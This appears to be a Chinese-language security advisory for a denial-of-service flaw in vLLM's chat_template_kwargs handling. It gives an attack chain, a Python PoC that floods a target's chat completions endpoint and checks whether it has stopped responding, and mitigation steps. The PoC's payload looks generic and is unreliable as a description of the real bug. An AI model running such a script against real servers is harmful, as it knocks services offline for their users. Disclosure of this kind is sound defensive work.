CVE-2025-62426: vLLM chat_template_kwargs参数拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-62426

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

vLLM

漏洞概述

vLLM是一个用于大型语言模型（LLM）推理和服务的开源引擎。该漏洞影响vLLM从0.5.5版本到0.11.1之前的所有版本。漏洞源于/v1/chat/completions和/tokenize API端点对chat_template_kwargs请求参数的处理不当。在这些端点中，chat_template_kwargs参数被直接用于代码逻辑，但在聊天模板验证之前就已被处理。攻击者可以通过发送包含特定chat_template_kwargs参数的请求，触发服务器进入长时间处理状态，从而耗尽服务器资源，导致所有其他用户请求被延迟或无法处理。此漏洞属于低权限拒绝服务攻击，无需用户交互即可实施，成功利用可造成服务可用性完全丧失。

技术细节

漏洞根因在于vLLM的chat_utils.py（约第1602-1610行）和serving_engine.py（约第809-814行）中对chat_template_kwargs参数的处理流程存在缺陷。当用户调用/v1/chat/completions或/tokenize端点时，服务器接收chat_template_kwargs参数后，在未进行充分验证的情况下直接将其传递给聊天模板处理逻辑。攻击者可以构造特殊的参数值（如包含大量嵌套数据或触发复杂模板渲染逻辑的值），使得模板处理过程陷入计算密集型操作或无限循环状态。由于Python GIL（全局解释器锁）的特性，这种CPU密集型操作会阻塞服务器进程，导致所有并发请求被阻塞。攻击者只需发送少量此类恶意请求即可实现对整个API服务的拒绝服务攻击。修复版本0.11.1通过在参数传递给模板前增加验证逻辑来解决此问题。

攻击链分析

STEP 1

步骤1

攻击者识别目标vLLM服务器版本，确认版本在0.5.5到0.11.1之间

STEP 2

步骤2

攻击者构造包含恶意chat_template_kwargs参数的HTTP请求

STEP 3

步骤3

向/v1/chat/completions或/tokenize端点发送恶意请求

STEP 4

步骤4

服务器在验证前处理chat_template_kwargs参数，触发计算密集型操作

STEP 5

步骤5

服务器进程被阻塞，无法处理其他正常请求

STEP 6

步骤6

通过发送少量恶意请求，攻击者实现对整个API服务的拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS
This PoC demonstrates the denial of service vulnerability in vLLM's 
chat_template_kwargs parameter handling.
"""

import requests
import json
import time
import concurrent.futures

TARGET_URL = "http://target-server:8000/v1/chat/completions"

def trigger_dos():
    """
    Send a malicious request with crafted chat_template_kwargs
    to trigger long processing time.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_API_KEY"
    }
    
    # Craft malicious payload with problematic chat_template_kwargs
    payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [
            {"role": "user", "content": "Hello"}
        ],
        # Malicious chat_template_kwargs that triggers DoS
        "chat_template_kwargs": {
            "loop_trigger": True,
            "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}}
        }
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            timeout=5
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - DoS successful")
    except Exception as e:
        print(f"Error: {e}")

def verify_dos():
    """
    Verify that the server is unresponsive after DoS attack.
    """
    normal_payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [{"role": "user", "content": "Hi"}]
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            json=normal_payload,
            timeout=10
        )
        return response.status_code == 200
    except:
        return False

if __name__ == "__main__":
    print("[*] Starting CVE-2025-62426 DoS attack...")
    
    # Send multiple malicious requests
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(trigger_dos) for _ in range(3)]
        concurrent.futures.wait(futures)
    
    print("[*] Verifying server availability...")
    time.sleep(2)
    
    if not verify_dos():
        print("[+] DoS confirmed - Server is unresponsive")
    else:
        print("[-] Server still responsive")

影响范围

vLLM >= 0.5.5 且 < 0.11.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在反向代理（如Nginx）中配置请求超时和限流规则；2) 限制chat_template_kwargs参数的大小和复杂度；3) 监控API端点的响应时间，设置告警阈值；4) 考虑临时禁用或限制chat_template_kwargs参数的使用；5) 使用WAF（Web应用防火墙）规则过滤异常的chat_template_kwargs请求。